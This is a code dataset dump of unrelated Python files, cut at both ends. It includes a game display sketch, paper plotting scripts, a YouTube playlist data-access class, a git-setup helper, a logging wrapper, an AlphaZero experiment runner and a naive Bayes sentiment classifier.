self.num = num\n self.arr = []\n for i in range(num):\n self.arr.append(Enemy(random.randint(0, width - 15), random.randint(0, 30) - 30))\n def move(self):\n for i in range(self.num):\n self.arr[i].move()\n\ndraw.rectangle((x, y, x+w, y+h), outline=udlr_outline, fill=udlr_fill)\nenemy = SpawnEnemy(10)\nstart = time.time()\n\n\n#temp1 = Image.open('missile.png')\n#file_out = 'missile.bmp'\n#temp1.save(file_out)\n\n\nbackground = Image.new(\"RGBA\", (width, height))\ndraw = ImageDraw.Draw(background)\n#print(help(draw))\ndraw.rectangle((0, 0, width, height), outline=0, fill=(255, 0, 0))\n\ntemp_image = Image.open('bomb-removebg-preview.png')\n#temp_image = temp_image.crop((0, 0, 0+width*0.2, height*0.2))\ntemp_image2 = Image.open('bomb.png')\n\n\nimage_coord = (50, 50)\n\ntemp_image = temp_image.resize((40, 40))\ntwidth, theight = temp_image.size[0], temp_image.size[1]\n\nfor x in range(0,twidth):# process all 
pixels\n    for y in range(0,theight):\n        data = temp_image.getpixel((x, y))\n        if (data[0] == 0 and data[1] == 0 and data[2] == 0 ):\n            temp_image.putpixel((x, y), background.getpixel((image_coord[0]+x,image_coord[1]+y)))\n\nbackground.paste(temp_image, (image_coord[0], image_coord[1])) # X, Y\n\n#temp_image = temp_image.resize((width, height))\n#background = Image.blend(background, temp_image, 0.5)\n\n#draw.bitmap((0, 0), temp_image)\n#draw.bitmap((width//2, height//2), temp_image2)\n#temp_width, temp_height = temp_image.width, temp_image.height\n#temp_image.crop((0, 0, 0+width*0.2, height*0.2))\n\n\n#draw.image(temp_image)\ndisp.image(background)\n\n\n'''\nwhile True:\n    spawnTime = time.time() - start\n    \n    if spawnTime > 10:\n        enemy = SpawnEnemy(10)\n        start = time.time()\n    \n    if not button_U.value: # up pressed \n        y -= 5\n    if not button_D.value: # down pressed\n        y += 5\n    if not button_L.value: # left pressed\n        x -= 5\n    if not button_R.value: # right pressed\n        x += 5\n\n    #if not button_C.value: # center pressed\n    #if not button_A.value: # A button pressed\n    #if not button_B.value: # B button pressed\n    \n    # Clear display\n    draw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\n\n    # Update\n    enemy.move()\n    draw.rectangle((x, y, x+w, y+h), outline=button_outline, fill=button_fill)   \n    \n    # Display the Image\n    disp.image(image)\n\n    time.sleep(0.01)\n'''\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"235180176","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom bar_code import detect\n\n# Switch to the test images folder\nos.chdir('imgs')\n\nimage_names = os.listdir()\n\nif __name__ == '__main__':\n    for image_name in image_names:\n        detect(image_name)","sub_path":"classic/OpenCV/barcode/img_pro.py","file_name":"img_pro.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"6815759","text":"\"\"\"Plots for RAWR paper\"\"\"\nimport pickle\nimport argparse \nimport pandas as pd\nimport matplotlib\nmatplotlib.use('agg')\nfrom plotnine import (\n    ggplot, aes, facet_wrap,\n    geom_histogram, geom_text, geom_segment, geom_density,\n    scale_color_manual, scale_fill_manual, scale_linetype_manual,\n    element_blank, element_text, element_rect, element_line,\n    theme_light,\n    xlim, ylim, xlab, ylab, theme\n)\n\n\nclass theme_fs(theme_light):\n    \"\"\"\n    A theme similar to :class:`theme_linedraw` but with light grey\n    lines and axes to direct more attention towards the data.\n    Parameters\n    ----------\n    base_size : int, optional\n        Base font size. All text sizes are scaled versions of\n        the base font size. 
Default is 11.\n base_family : str, optional\n Base font family.\n \"\"\"\n\n def __init__(self, base_size=11, base_family='DejaVu Sans'):\n theme_light.__init__(self, base_size, base_family)\n self.add_theme(theme(\n axis_ticks=element_line(color='#DDDDDD', size=0.5),\n panel_border=element_rect(fill='None', color='#838383',\n size=1),\n strip_background=element_rect(\n fill='#DDDDDD', color='#838383', size=1),\n strip_text_x=element_text(color='black'),\n strip_text_y=element_text(color='black', angle=-90)\n ), inplace=True)\n\n\nCOLORS = [\n '#49afcd', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd',\n '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf'\n]\nFIGURES_STATS_FILE = \"data/figure_stats.pkl\"\n\n\ndef figfile(s):\n return 'auto_fig/' + str(s)\n\n\ndef create_df(nums, task, method):\n df = pd.DataFrame({'x': nums})\n df['Task'] = task\n df['Method'] = method\n return df\n\n\ndef load_data(data_file):\n with open(data_file, 'rb') as f:\n data = pickle.load(f)\n\n print(\"data\", data)\n\n len_rows = [\n create_df(data[0], \"SA Baseline\", \"Original\"),\n create_df(data[1], \"SA Baseline\", \"Reduced\"),\n create_df(data[2], \"SA Combined\", \"Original\"),\n create_df(data[3], \"SA Combined\", \"Reduced\")\n ]\n\n # count = 0\n # for val in data[1]:\n # if val == 1:\n # count += 1\n # print(\"PERCENT\", count/872)\n # exit(0)\n\n # len_rows = [\n # create_df(data[0], 'SNLI', 'Original'),\n # create_df(data[1], 'SNLI', 'Reduced'),\n # create_df(data[4], 'SQuAD', 'Original'),\n # create_df(data[5], 'SQuAD', 'Reduced'),\n # create_df(data[10], 'VQA', 'Original'),\n # create_df(data[11], 'VQA', 'Reduced')\n # ]\n\n # conf_rows = [\n # create_df(data[2], 'SNLI', 'Original'),\n # create_df(data[3], 'SNLI', 'Reduced'),\n # create_df(data[6], 'SQuAD Start', 'Original'),\n # create_df(data[7], 'SQuAD End', 'Original'),\n # create_df(data[8], 'SQuAD Start', 'Reduced'),\n # create_df(data[9], 'SQuAD End', 'Reduced'),\n # create_df(data[12], 'VQA', 'Original'),\n # create_df(data[13], 'VQA', 'Reduced')\n # ]\n\n len_df = pd.concat(len_rows)\n # len_df['Task'] = len_df['Task'].astype('category').cat.reorder_categories([\n # 'SQuAD', 'SNLI', 'VQA'\n # ])\n\n len_df['Task'] = len_df['Task'].astype('category')\n len_df['Method'] = len_df['Method'].astype('category')\n\n # conf_df = pd.concat(conf_rows)\n # conf_df['Task'] = conf_df['Task'].astype('category').cat.reorder_categories([\n # 'SQuAD Start', 'SQuAD End', 'SNLI', 'VQA'\n # ])\n # conf_df['Method'] = conf_df['Method'].astype('category')\n\n # return len_df, conf_df\n\n return len_df, None \n\n\ndef create_length_plot(len_df, legend_position='right', legend_box='vertical'):\n mean_len_df = len_df.groupby(['Task', 'Method']).mean().reset_index()\n\n mean_len_df[' '] = 'Mean Length'\n print(len_df)\n\n plt = (\n ggplot(len_df)\n + aes(x='x', fill='Method', y='..density..')\n + geom_histogram(binwidth=2, position='identity', alpha=0.6)\n + geom_text(\n aes(x='x', y=.22, label='x', color='Method'),\n mean_len_df,\n inherit_aes=False,\n format_string='{:.1f}',\n show_legend=False\n )\n + geom_segment(\n aes(x='x', xend='x', y=0, yend=.205, linetype=' '),\n mean_len_df,\n inherit_aes=False, color='black'\n )\n + scale_linetype_manual(['dashed'])\n + facet_wrap('Task')\n # + xlim(0, 40) \n + ylim(0, 0.35)\n + xlab('Example Length') + ylab('Frequency')\n + scale_color_manual(values=COLORS)\n + scale_fill_manual(values=COLORS)\n + theme_fs()\n + theme(\n aspect_ratio=1,\n legend_title=element_blank(),\n legend_position=legend_position,\n 
legend_box=legend_box,\n )\n )\n\n return plt\n\n\ndef create_confidence_plot(conf_df):\n plt = (\n ggplot(conf_df)\n + aes(x='x', color='Method', fill='Method')\n + geom_density(alpha=.45)\n + facet_wrap('Task', nrow=4)\n + xlab('Confidence')\n + scale_color_manual(values=COLORS)\n + scale_fill_manual(values=COLORS)\n + theme_fs()\n + theme(\n axis_text_y=element_blank(),\n axis_ticks_major_y=element_blank(),\n axis_title_y=element_blank(),\n legend_title=element_blank(),\n legend_position='top',\n legend_box='horizontal',\n )\n )\n return plt\n\n\ndef main():\n args = argument_parsing()\n\n print('Loading data from: ' + 'data/input_reduction_stats_{}.pkl'.format(args.id))\n len_df, conf_df = load_data('data/input_reduction_stats_{}.pkl'.format(args.id))\n print(len_df)\n\n print('Generating length histogram plot...')\n len_plt = create_length_plot(len_df)\n\n len_output_file = figfile('input_reduction_length_histogram_{}.pdf'.format(args.id))\n print('Saving to: ' + str({len_output_file}))\n len_plt.save(len_output_file)\n\n\ndef argument_parsing():\n parser = argparse.ArgumentParser(description='One argparser')\n parser.add_argument('--id', type=int, help='ID number')\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n main()","sub_path":"SA/analysis/create_ir_figures.py","file_name":"create_ir_figures.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"159096424","text":"\n\nfrom xai.brain.wordbase.adjectives._visionary import _VISIONARY\n\n#calss header\nclass _VISIONARIES(_VISIONARY, ):\n\tdef __init__(self,): \n\t\t_VISIONARY.__init__(self)\n\t\tself.name = \"VISIONARIES\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"visionary\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_visionaries.py","file_name":"_visionaries.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"601822658","text":"#place for imports\r\nimport urllib.request\r\nimport time\r\nfrom os import system, name\r\nimport os\r\nimport requests\r\nimport configuration as config\r\n\r\ndef clear():\r\n # for windows\r\n if name == 'nt':\r\n _ = system('cls')\r\n \r\n # for macOS and linux\r\n else:\r\n _ = system('clear')\r\n\r\ndef check():\r\n print(\"CheckRa1n checker.\")\r\n print(\"Made with love by @w1nk000 and @Encryptize\")\r\n print(\"[Downloading...]\")\r\n r = requests.get(config.url, allow_redirects=True)\r\n open('index.html', 'wb').write(r.content)\r\n print(\"[Downloading done.]\")\r\n print(\"Is Checkra1n released? 
Checking now...\")\r\n t = time.localtime()\r\n current_time = time.strftime(\"%d.%m.%Y, %H:%M %z\")\r\n with open('index.html') as f:\r\n if 'eta son' in f.read():\r\n print(current_time + \": Still no :(\")\r\n else:\r\n print(current_time + \": FINALLY YES!!!\")\r\n os.remove('index.html')\r\n time.sleep(config.refresh)\r\n clear()\r\n\r\nwhile True:\r\n clear()\r\n check()\r\n","sub_path":"CHECKra1n.py","file_name":"CHECKra1n.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"467108222","text":"import json\nimport os\nimport re\n\nfrom typing import Any, Dict, Generator, List, Optional\n\nSUPRA_ID = \"UC6iBH7Pmiinoe902-JqQ7aQ\"\n\nBVGM_PLAYLIST_IDS = (\n \"PL9B23A78D3D249A74\", # 1\n \"PLF10B9FEF959D8065\", # 2\n \"PLB45265BFFA7BE793\", # 3\n \"PL632918E68D9E576A\", # 4\n \"PL16375BD0AA7CB9B9\", # 5\n \"PL3A5F5309568FEB54\", # 6\n \"PLz2Bd4VjE_0WzuZ8MhtJVnht77NSirtwR\", # 7\n \"PLz2Bd4VjE_0VhYCcUKF8mcOkYXVVUyBMI\", # 8\n \"PLz2Bd4VjE_0WdSywD9jjN132_0YME_psr\", # 9\n \"PLz2Bd4VjE_0Vw55wuTq7ine06pDKnkMC5\", # 10\n \"PLz2Bd4VjE_0UiEAFkiEABy9SQt1WPdp1_\", # 11\n \"PLz2Bd4VjE_0WLmOKFO1DEogbIGIp3PzRU\", # 12\n \"PLz2Bd4VjE_0Wuw9TuOipbZtx7vQNCgB-Q\", # 13\n)\nOTHER_PLAYLIST_IDS = (\n \"PLz2Bd4VjE_0WTtp7zh-kNqnbcPxVMXUZE\",\n \"PLz2Bd4VjE_0Xhvmx4l_XcsZ16AvpgBb0q\",\n \"PLz2Bd4VjE_0Xt4GMfbCll_Xt2o_QJl3T9\",\n \"PLz2Bd4VjE_0Uuo5qDjgwpdbj1pUMwhXu0\",\n \"PL719789CCE8C818B5\",\n \"PLC28D927FFE1F659B\",\n \"PL7565A9718D6CEBA3\",\n \"PL0FBC75AC445137EC\",\n \"PL518CB8785D7478E4\",\n \"PL34FAB428055ED1D3\",\n)\n\nROOT_DIR = os.path.join(os.getcwd(), \"db\")\n\nBVGM_NUM_REGEX = re.compile(r\"^.*Best VGM (\\d+).*\")\n\n\nclass DataAccess:\n def __init__(self, root_dir: Optional[str] = None):\n self.root_dir = root_dir or os.getcwd()\n self.db_dir = os.path.join(self.root_dir, \"db\")\n\n @staticmethod\n def __get_json(abs_file_path: str) -> Any:\n with open(abs_file_path, mode=\"r\", encoding=\"utf-8\") as f:\n raw_data = f.read()\n result = json.loads(raw_data)\n\n return result\n\n @staticmethod\n def __get_bvgm_number(video) -> int:\n title = video[\"snippet\"][\"title\"]\n return int(re.match(BVGM_NUM_REGEX, title).group(1))\n\n def get_playlists(self, ids: List[str] = None) -> List:\n root, _, files = next(os.walk(os.path.join(self.db_dir, \"playlists\")))\n\n result = []\n for filename in files:\n pid = filename.split(\".\")[0]\n\n # Skip if not in the desired set.\n if ids and pid not in ids:\n continue\n\n playlist = self.__get_json(os.path.join(root, filename))\n result.append(playlist)\n return result\n\n def get_pitems_dict(\n self, playlist_ids: Optional[List[str]] = None\n ) -> Dict[str, Any]:\n _, _, files = next(os.walk(os.path.join(self.db_dir, \"playlist_items\")))\n pitems_ids = [filename.split(\".\")[0] for filename in files]\n\n result = {}\n if not playlist_ids:\n _, _, files = next(os.walk(os.path.join(self.db_dir, \"playlists\")))\n playlist_ids = [filename.split(\".\")[0] for filename in files]\n for playlist_id in playlist_ids:\n if playlist_id not in pitems_ids:\n # Don't have playlist items for this playlist.\n continue\n\n result[playlist_id] = self.get_playlist_items(playlist_id)\n\n return result\n\n def get_playlist_items(self, playlist_id: str) -> List:\n return self.__get_json(\n os.path.join(self.db_dir, \"playlist_items\", f\"{playlist_id}.json\")\n )\n\n def get_videos_dict(self, playlist_ids: str) -> Dict[str, List]:\n result = {}\n for pid in playlist_ids:\n videos = 
[video for video in self.gen_videos_for_playlist(pid)]\n result[pid] = videos\n\n return result\n\n def gen_videos_for_playlist(self, playlist_id: str) -> Generator[Any, None, None]:\n playlist_items = self.get_playlist_items(playlist_id)\n\n for item in playlist_items:\n vid = item[\"contentDetails\"][\"videoId\"]\n try:\n yield self.get_video(vid)\n except FileNotFoundError:\n print(f\"Couldn't find video: {vid}\")\n\n return None\n\n def get_all_videos(self, sort: bool = False):\n videos = []\n\n root, _, files = next(os.walk(os.path.join(self.db_dir, \"videos\")))\n\n for filename in files:\n video = self.__get_json(os.path.join(root, filename))\n videos.append(video)\n\n if sort:\n videos.sort(key=lambda item: self.__get_bvgm_number(item))\n\n return videos\n\n def gen_all_videos_in_order(\n self, from_vid: Optional[str] = None\n ) -> Generator[Any, None, None]:\n ordered_vids = self.__get_json(os.path.join(self.db_dir, \"bvgm_video_ids.json\"))\n\n if from_vid:\n from_index = ordered_vids.index(from_vid)\n ordered_vids = ordered_vids[from_index:]\n\n for vid in ordered_vids:\n yield self.__get_json(os.path.join(self.db_dir, \"videos\", f\"{vid}.json\"))\n\n return None\n\n def get_video(self, vid: str):\n return self.__get_json(os.path.join(self.db_dir, \"videos\", f\"{vid}.json\"))\n\n def get_threads_for_video(self, vid: str):\n return self.__get_json(\n os.path.join(self.db_dir, \"commentThreads\", f\"{vid}.json\")\n )\n\n def have_video(self, vid: str):\n return os.path.exists(os.path.join(self.db_dir, \"videos\", f\"{vid}.json\"))\n\n def have_comments_for_video(self, vid: str):\n return os.path.exists(\n os.path.join(self.db_dir, \"commentThreads\", f\"{vid}.json\")\n )\n","sub_path":"data_access.py","file_name":"data_access.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"88746310","text":"from django.db import models\n\n# Create your models here.\n\nclass System(models.Model):\n CATEGORY = [\n (\"system\", \"system\"),\n (\"data_store\", \"dateStore\")\n ]\n\n SERVICE = [\n ('internal', \"internal\"),\n (\"outernal\", \"outernal\")\n ]\n\n name = models.CharField(max_length=255)\n category = models.CharField(\n max_length=20,\n choices=CATEGORY,\n default=\"system\"\n )\n service = models.CharField(\n max_length=10,\n choices=SERVICE,\n default=\"internal\"\n )\n memo = models.TextField(null=True, blank=True)\n layer = models.IntegerField(default=1)\n connect_to = models.ManyToManyField(\"self\", verbose_name=\"接続先\", blank=True)\n connect_from = models.ManyToManyField(\"self\", verbose_name=\"接続元\", blank=True)\n parent = models.ManyToManyField(\"self\", verbose_name=\"親システム\", blank=True)\n\n def __str__(self):\n return \"{}(L{})\".format(self.name, self.layer)","sub_path":"overviewer/systems/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"71280745","text":"# echo \"# automation\" >> README.md\n# git init\n# git add README.md\n# git commit -m \"first commit\"\n# git remote add origin https://github.com/3lif1/automation.git\n# git push -u origin master\n\nimport subprocess\nimport argparse\n\n\ndef commands(automation, URL_github):\n shell = \"echo {} >> README.md\".format(automation)\n subprocess.call(shell, shell=True)\n subprocess.call([\"git\", \"init\"])\n subprocess.call([\"git\", \"add\", \"-A\"])\n subprocess.call([\"git\", \"commit\", 
\"-m\", \"\\\"first commit\\\"\"])\n subprocess.call([\"git\", \"remote\", \"add\", \"origin\", URL_github])\n subprocess.call([\"git\", \"push\", \"-u\", \"origin\", \"master\"])\ndef get_arguments():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-p\", \"--project_name\", dest=\"project_name\", help=\"specify your project name\")\n parser.add_argument(\"-u\", \"--UserName\", dest=\"UserName\", help=\"specify your User name in github\")\n\n options = parser.parse_args()\n\n #handling errors:\n if not options.project_name:\n parser.error(\"[-] Please specify your project name\")\n elif not options.UserName:\n parser.error(\"[-] Please specify your User name in github\")\n return options\n\noptions = get_arguments()\n\nURL_github = \"https://github.com/{}/{}.git\".format(options.UserName , options.project_name)\n#print(URL_github)\n\nprojectName = options.project_name\ncommands(projectName, URL_github)\n","sub_path":"git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457125332","text":"#encoding=utf-8\n__author__ = 'Administrator'\n\nimport logging\nimport logging.handlers\nimport os\nimport time\n\nclass LOG:\n\n def __init__(self, filesize, dir = None): #初始化,fileszie为日志文件最大大小,如果超出,则日志写入到新的文件\n if(dir is None):\n self.PATH = os.path.join(os.getcwd(), 'log')\n else:\n self.PATH = os.path.join(os.getcwd(), dir)\n self.EXTNAME = '.log'\n self.FILESIZE = filesize\n self.logger = logging.getLogger()\n self.FILENAME = ''\n\n def __check(self, filename): #私有方法__check(),用于检测并生成日志文件名\n path = os.path.join(self.PATH, time.strftime('%Y%m%d'))\n if(not os.path.exists(path)):\n os.makedirs(path)\n LOG_FILENAME = os.path.join(path, filename + self.EXTNAME)\n if(os.path.exists(LOG_FILENAME)):\n filesize = os.path.getsize(LOG_FILENAME)\n if(filesize > self.FILESIZE):\n for i in range(1,100):\n newFileName = filename + '(' + str(i) + ')'\n LOG_FILENAME = os.path.join(path, newFileName + self.EXTNAME)\n if(os.path.exists(LOG_FILENAME)):\n filesize = os.path.getsize(LOG_FILENAME)\n if(filesize < self.FILESIZE):\n break\n else:\n break\n self.FILENAME = LOG_FILENAME\n\n def __info(self, content): #私有方法 __info()\n handler = logging.FileHandler(self.FILENAME)\n formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.level = logging.NOTSET\n self.logger.info(content)\n self.logger.removeHandler(handler)\n handler.close()\n\n def info(self, content): #公共方法 info() 写info日志\n self.__check('info')\n self.__info(content)\n\n def __debug(self, content): #私有方法 __debug\n handler = logging.FileHandler(self.FILENAME)\n formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.level = logging.NOTSET\n self.logger.debug(content)\n self.logger.removeHandler(handler)\n handler.close()\n\n def debug(self, content): #公共方法 debug() 写debug日志\n self.__check('debug')\n self.__debug(content)\n\n def __warning(self, content): #私有方法 __warning()\n handler = logging.FileHandler(self.FILENAME)\n formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)\n self.logger.level = logging.NOTSET\n self.logger.warning(content)\n self.logger.removeHandler(handler)\n handler.close()\n\n def warning(self, content): #公共方法 warning() 写warning日志\n 
self.__check('warning')\n        self.__warning(content)\n\n    def __error(self, content): #private method __error()\n        handler = logging.FileHandler(self.FILENAME)\n        formatter = logging.Formatter('%(asctime)s %(levelname)s:%(message)s')\n        handler.setFormatter(formatter)\n        self.logger.addHandler(handler)\n        self.logger.level = logging.NOTSET\n        self.logger.error(content)\n        self.logger.removeHandler(handler)\n        handler.close()\n\n    def error(self, content): #public method error(), writes an error log\n        self.__check('error')\n        self.__error(content)","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"324569420","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nOne-player Alpha Zero\n@author: Thomas Moerland, Delft University of Technology\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport time\nfrom utils.parser_setup import setup_parser, parse_game_params, parse_alg_name\nplt.style.use('ggplot')\nfrom agent import agent\n\n#### Command line call, parsing and plotting ##\ncolors = ['r', 'b', 'g', 'orange', 'c', 'k', 'purple', 'y']\nmarkers = ['o', 's', 'v', 'D', 'x', '*', '|', '+', '^', '2', '1', '3', '4']\n\nbudgets = [1000, 5000, 10000, 20000, 35000]\nif __name__ == '__main__':\n\n    # Obtain the command_line arguments\n    args = setup_parser()\n\n    start_time = time.time()\n    time_str = str(start_time)\n    out_dir = 'logs/' + args.game + '/' + time_str + '/'\n\n\n    def pre_process():\n        from gym.envs.registration import register\n        try:\n            register(\n                id='Blackjack_pi-v0',\n                entry_point='envs.blackjack_pi:BlackjackEnv',\n            )\n        except:\n            print(\"Something wrong registering Blackjack environment\")\n\n    # Disable GPU acceleration if not specifically requested\n    if not args.gpu:\n        os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n    fun_args = [args.game, args.n_ep, args.n_mcts, args.max_ep_len, args.lr, args.c, args.gamma,\n                args.data_size, args.batch_size, args.temp, args.n_hidden_layers, args.n_hidden_units,\n                True, args.eval_freq, args.eval_episodes, args.n_epochs]\n    exps = []\n\n    game_params = parse_game_params(args)\n\n    # Define the name of the agent to be stored in the dataframe\n    if args.stochastic:\n        agent_name = \"dpw_\"\n    elif args.particles > 0:\n        agent_name = str(args.particles) + \"_pf_\"\n    else:\n        agent_name = \"classic_\"\n\n    if args.mcts_only:\n        agent_name += \"mcts_only\"\n    else:\n        agent_name += \"alphazero\"\n    min_alpha = 0.5\n    delta_alpha = 0.1\n    max_alpha = 1.\n    for budget in budgets:\n        alpha = min_alpha\n        while alpha <= max_alpha + 0.01:\n            # If required, prepare the budget scheduler parameters\n            scheduler_params = None\n            print(\"Performing experiment with budget \" + str(budget) + \" alpha:\" + str(alpha) + \"!\")\n            print()\n            if args.budget_scheduler:\n                assert args.min_budget < budget, \"Minimum budget for the scheduler cannot be larger \" \\\n                                                 \"than the overall budget\"\n                assert args.slope >= 1.0, \"Slope lesser than 1 causes weird schedule function shapes\"\n                scheduler_params = {\"slope\": args.slope,\n                                    \"min_budget\": args.min_budget,\n                                    \"mid\": args.mid}\n\n            alg = parse_alg_name(args)\n\n            out_dir = \"logs/\" + args.game + \"/alpha_experiment/\"\n            if not args.budget_scheduler:\n                out_dir += 'no_scheduler/'\n            out_dir += str(alpha)[:3]\n            if args.game == 'RiverSwim-continuous':\n                out_dir += \"/\" + \"fail_\" + str(args.fail_prob)\n            out_dir += \"/\" + alg + str(budget) + '/' + time_str + '/'\n            if not os.path.exists(out_dir):\n                
os.makedirs(out_dir)\n\n # Run experiments\n n_mcts = np.inf\n out_dir_i = out_dir + '/'\n # Run the algorithm\n episode_returns, timepoints, a_best, \\\n seed_best, R_best, offline_scores = agent(game=args.game,\n n_ep=args.n_ep,\n n_mcts=n_mcts,\n max_ep_len=args.max_ep_len,\n budget=budget,\n lr=args.lr,\n c=args.c,\n gamma=args.gamma,\n data_size=args.data_size,\n batch_size=args.batch_size,\n temp=args.temp,\n n_hidden_layers=args.n_hidden_layers,\n n_hidden_units=args.n_hidden_units,\n stochastic=args.stochastic,\n alpha=alpha,\n numpy_dump_dir=out_dir_i,\n visualize=False,\n eval_freq=args.eval_freq,\n eval_episodes=args.eval_episodes,\n pre_process=None,\n game_params=game_params,\n n_epochs=args.n_epochs,\n parallelize_evaluation=args.parallel,\n mcts_only=args.mcts_only,\n particles=args.particles,\n n_workers=args.n_workers,\n use_sampler=args.use_sampler,\n unbiased=args.unbiased,\n biased=args.biased,\n variance=args.variance,\n depth_based_bias=args.depth_based_bias,\n max_workers=args.max_workers,\n scheduler_params=scheduler_params,\n out_dir=out_dir,\n second_version=args.second_version,\n third_version=args.third_version)\n\n total_rewards = offline_scores[0][0]\n undiscounted_returns = offline_scores[0][1]\n evaluation_lenghts = offline_scores[0][2]\n evaluation_pit_action_counts = offline_scores[0][3]\n\n indices = []\n returns = []\n lens = []\n rews = []\n counts = []\n\n gamma = args.gamma\n\n # Compute the discounted return\n for r_list in undiscounted_returns:\n discount = 1\n disc_rew = 0\n for r in r_list:\n disc_rew += discount * r\n discount *= gamma\n rews.append(disc_rew)\n\n # Fill the lists for building the dataframe\n for ret, length, count in zip(total_rewards, evaluation_lenghts, evaluation_pit_action_counts):\n returns.append(ret)\n lens.append(length)\n indices.append(agent_name)\n counts.append(count)\n\n # Store the result of the experiment\n data = {\"agent\": indices,\n \"total_reward\": returns,\n \"discounted_reward\": rews,\n \"length\": lens,\n \"budget\": [budget] * len(indices)}\n\n # Store the count of pit stops only if analyzing Race Strategy problem\n if \"RaceStrategy\" in args.game:\n data[\"pit_count\"] = counts\n\n # Write the dataframe to csv\n df = pd.DataFrame(data)\n df.to_csv(out_dir + \"/data.csv\", header=True, index=False)\n alpha += delta_alpha\n alpha = round(alpha, 1)\n","sub_path":"run_multiple_alpha_experiment.py","file_name":"run_multiple_alpha_experiment.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112785878","text":"import time\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import *\n\nTRAIN_DATA_FILE = 'train_mapped.tsv'\n\n\ndef load_train_data(path):\n data = pd.read_csv(path, sep='\\t', header=0)\n\n data['Sentiment'] = data['Sentiment'].map(lambda x: 0 if x == 0 else x)\n data['Sentiment'] = data['Sentiment'].map(lambda x: 1 if x == 2 else x)\n data['Sentiment'] = data['Sentiment'].map(lambda x: 2 if x == 4 else x)\n\n # Remove empty\n data['Phrase'].replace('', np.nan, inplace=True)\n data.dropna(subset=['Phrase'], inplace=True)\n\n data['Phrase'] = data['Phrase'].astype(str)\n\n return data\n\n\ncurrent_time = time.time()\n\ntrain = load_train_data('../data/' + TRAIN_DATA_FILE)\n\nload_time = 
time.time() - current_time\n\nprint('Time to Load ' + TRAIN_DATA_FILE + ': ' + str(load_time) + 's')\n\ntrain_X, test_X, train_y, test_y = train_test_split(train['Phrase'], train['Sentiment'], test_size=0.20)\n\nbigram_vectorizer = CountVectorizer(analyzer=\"word\",\n tokenizer=None,\n preprocessor=None,\n stop_words=None,\n ngram_range=(1, 1),\n strip_accents='unicode')\n\nbigram_feature_matrix_train = bigram_vectorizer.fit_transform(train_X)\nbigram_feature_matrix_test = bigram_vectorizer.transform(test_X)\n\nbigram_multinomialNB_classifier = MultinomialNB().fit(bigram_feature_matrix_train, train_y)\nbigram_multinomialNB_prediction = bigram_multinomialNB_classifier.predict(bigram_feature_matrix_test)\n\nmodel = 'Unigram-Trigram Multinomial Naive Bayes'\ntarget_names = ['0', '1', '2']\n\nprint(\n '-------' + '-' * len(model))\nprint(\n 'MODEL:', model)\nprint(\n '-------' + '-' * len(model))\n\nprint(\n 'Precision = ' + str(metrics.precision_score(test_y, bigram_multinomialNB_prediction, average=None)))\nprint(\n 'Recall = ' + str(metrics.recall_score(test_y, bigram_multinomialNB_prediction, average=None)))\nprint(\n 'F1 = ' + str(metrics.f1_score(test_y, bigram_multinomialNB_prediction, average=None)))\nprint(\n 'Accuracy = %.2f%%' % (metrics.accuracy_score(test_y, bigram_multinomialNB_prediction) * 100.0))\nprint(\n 'Confusion matrix = \\n' + str(\n metrics.confusion_matrix(test_y, bigram_multinomialNB_prediction, labels=[0, 1, 2])))\nprint('\\nClassification Report:\\n' + classification_report(test_y, bigram_multinomialNB_prediction,\n target_names=target_names))\nprint('Time to Train and Test: ' + str(time.time() - current_time) + 's')\n","sub_path":"src/model_naive_bayes.py","file_name":"model_naive_bayes.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"212761051","text":"from pathlib import Path\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom torch.utils.data import Dataset\n\n\ndef 